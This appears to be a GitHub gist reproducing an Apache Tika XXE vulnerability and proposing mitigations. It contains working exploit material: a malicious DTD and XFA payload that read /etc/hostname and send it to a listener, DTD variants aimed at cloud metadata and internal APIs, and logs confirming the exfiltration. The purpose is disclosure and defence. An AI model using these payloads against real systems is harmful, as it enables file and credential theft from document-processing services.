Skip to content

Instantly share code, notes, and snippets.

@N3mes1s
Last active December 10, 2025 08:06
Show Gist options
  • Select an option

  • Save N3mes1s/6265dc47e542551ce81ed1909a7cf371 to your computer and use it in GitHub Desktop.

Select an option

Save N3mes1s/6265dc47e542551ce81ed1909a7cf371 to your computer and use it in GitHub Desktop.
CVE-2025-66516 - Apache Tika XXE Out-of-Band Data Exfiltration

Apache Tika XXE Out-of-Band Data Exfiltration

Summary

  • Product / Component: Apache Tika (tika-core + tika-parser-pdf-module) - XFA PDF Parser
  • Impact: Unauthenticated attacker can exfiltrate arbitrary local files from systems parsing malicious PDFs. Data is sent to attacker-controlled servers via HTTP requests, enabling "blind" XXE exploitation where parser output is not visible. Additionally enables SSRF to internal services (cloud metadata endpoints, internal APIs).
  • Severity: High (CVSS: 9.8 Critical per GHSA)
  • Affected Versions: tika-core 1.13 - 3.2.1, tika-parser-pdf-module 2.0.0 - 3.2.1
  • Fixed: Apache Tika 3.2.2 (commit bfee6d5)
  • Reproduction Status: CONFIRMED (Tika 3.2.1, OpenJDK 21.0.9, Ubuntu 22.04)
  • Identifiers:
    • CVE-2025-54988
    • CVE-2025-66516
    • GHSA-f58c-gq56-vjjf

Root Cause

Apache Tika's PDF parser delegates XFA (XML Forms Architecture) processing to Xerces XML parser with external entity resolution enabled. When processing a malicious PDF containing an XFA form with a DOCTYPE declaration that references an external DTD:

  1. Tika parses the PDF and encounters the embedded XFA XML
  2. Xerces resolves the external DTD from an attacker-controlled server
  3. The DTD defines parameter entities that:
    • Read local files via file:// URIs (e.g., /etc/hostname, /etc/passwd)
    • Construct a URL containing the file contents as a parameter
  4. Xerces makes an outbound HTTP request to http://attacker/?data=<file_contents>
  5. The attacker receives the exfiltrated data in their server logs

Key vulnerability characteristics:

  • Works in "blind" scenarios where parser output isn't returned to the attacker
  • Silent exfiltration via network - no visible indication in parser output
  • Can target any file readable by the Tika process
  • Enables SSRF to internal services (AWS metadata at 169.254.169.254, internal APIs)

The fix in Tika 3.2.2 disables external parameter entity resolution for XFA parsing, preventing the DTD fetch and subsequent data exfiltration.

Attack Chain

┌─────────────────┐     ┌──────────────────┐     ┌─────────────────┐
│ Malicious PDF   │────▶│  Apache Tika     │────▶│ Attacker Server │
│ with XFA + DTD  │     │  3.2.1           │     │ (port 8888)     │
│ reference       │     │                  │     │                 │
└─────────────────┘     └──────────────────┘     └─────────────────┘
                              │                        │
                              │ 1. GET /evil.dtd       │
                              │───────────────────────▶│
                              │                        │
                              │ 2. DTD with entities   │
                              │◀───────────────────────│
                              │                        │
                              │ 3. Read /etc/hostname  │
                              │   (local file)         │
                              │                        │
                              │ 4. GET /?data=<hostname>│
                              │───────────────────────▶│
                              │                        │
                              │     EXFILTRATED!       │

Reproduction

Prerequisites

  • Java 17+ (tested with OpenJDK 21.0.9)
  • Python 3.x (for HTTP server and PoC generator)
  • Git
  • Network connectivity (or localhost testing)

Automated Reproduction

# Run the reproduction script
./repro/reproduction_steps.sh

The script:

  1. Clones the public PoC from https://github.com/mgthuramoemyint/POC-CVE-2025-54988
  2. Downloads tika-app-3.2.1.jar from Maven Central
  3. Generates malicious PDF (malicious_oob.pdf) with embedded XFA and external DTD reference
  4. Creates evil.dtd that extracts /etc/hostname and sends it to localhost:8888
  5. Starts Python HTTP server on port 8888 to serve DTD and capture exfiltrated data
  6. Executes Tika against the malicious PDF
  7. Verifies the exfiltration by checking server logs

Manual Reproduction

  1. Create the malicious DTD (evil.dtd):
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8888/?data=%file;'>">
%all;
  1. Create PDF with XFA containing:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://127.0.0.1:8888/evil.dtd">
  %dtd;
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">&send;</xdp:xdp>
  1. Start listener:
python3 -m http.server 8888 --directory /path/to/dtd/
  1. Parse with Tika:
java -jar tika-app-3.2.1.jar malicious.pdf
  1. Check listener logs for exfiltrated data

Evidence

Listener Log (logs/listener_20251209-152555.log)

127.0.0.1 - - [09/Dec/2025 15:25:57] "GET /evil.dtd HTTP/1.1" 200 -
127.0.0.1 - - [09/Dec/2025 15:25:57] "GET /?data=lima-pruva-ghsa-f58c-gq56-vjjf-apache-tika-xxe-oob-e-20251209134317 HTTP/1.1" 200 -

Analysis:

  1. First request: Tika fetched evil.dtd from the attacker server
  2. Second request: Tika sent the contents of /etc/hostname (the VM hostname) in the data parameter
  3. Both requests occurred within the same second, demonstrating immediate exploitation

Environment

  • Java: OpenJDK 21.0.9
  • Python: 3.10.12
  • OS: Ubuntu 22.04 (Lima VM)
  • Tika Version: 3.2.1 (vulnerable)

Artifacts

  • Malicious PDF: artifacts/tika-oob-runs/run-*/payload/malicious_oob.pdf
  • Evil DTD: artifacts/tika-oob-runs/run-*/payload/evil.dtd
  • Listener logs: logs/listener_*.log
  • Tika output: logs/tika_*.log
  • PoC source: artifacts/POC-CVE-2025-54988/

Real-World Attack Scenarios

Scenario 1: Document Processing Service

An organization uses Tika to extract text/metadata from user-uploaded PDFs. An attacker uploads a malicious PDF to exfiltrate:

  • AWS credentials from ~/.aws/credentials
  • Environment variables containing secrets
  • Application configuration files
  • Database connection strings

Scenario 2: Cloud Metadata SSRF

Attacker crafts DTD to access cloud metadata:

<!ENTITY % file SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

Enables credential theft from AWS, GCP, Azure instances running Tika.

Scenario 3: Internal Network Reconnaissance

Use XXE to probe internal services:

<!ENTITY % file SYSTEM "http://internal-api:8080/health">

Map internal infrastructure and identify additional attack surfaces.

Recommendations

Immediate Mitigations

  1. Upgrade to Tika 3.2.2 or later

    <dependency>
        <groupId>org.apache.tika</groupId>
        <artifactId>tika-core</artifactId>
        <version>3.2.2</version>
    </dependency>
  2. If upgrade is not immediately possible:

    • Disable XFA parsing entirely via tika-config.xml
    • Implement network egress filtering to block unexpected outbound requests
    • Run Tika in a sandboxed environment with no network access

Defense in Depth

  1. Network Controls:

    • Block outbound HTTP/HTTPS from document processing services
    • Implement allow-list for necessary external resources
    • Monitor for unusual DNS queries or outbound connections
  2. File System Isolation:

    • Run Tika with minimal file system permissions
    • Use containerization with read-only root filesystem
    • Mount only necessary directories
  3. Input Validation:

    • Scan uploaded PDFs for suspicious XML structures before processing
    • Implement file size limits to prevent resource exhaustion
    • Consider using a separate, isolated service for PDF processing
  4. Monitoring:

    • Alert on Tika processes making unexpected network connections
    • Log all outbound requests from document processing infrastructure
    • Monitor for access to sensitive files

References

CWE Classification

  • CWE-611: Improper Restriction of XML External Entity Reference
  • CWE-918: Server-Side Request Forgery (SSRF)
  • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

Report Generated: 2025-12-09 Reproduction Status: CONFIRMED Idempotency Verified: Yes (multiple successful runs)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment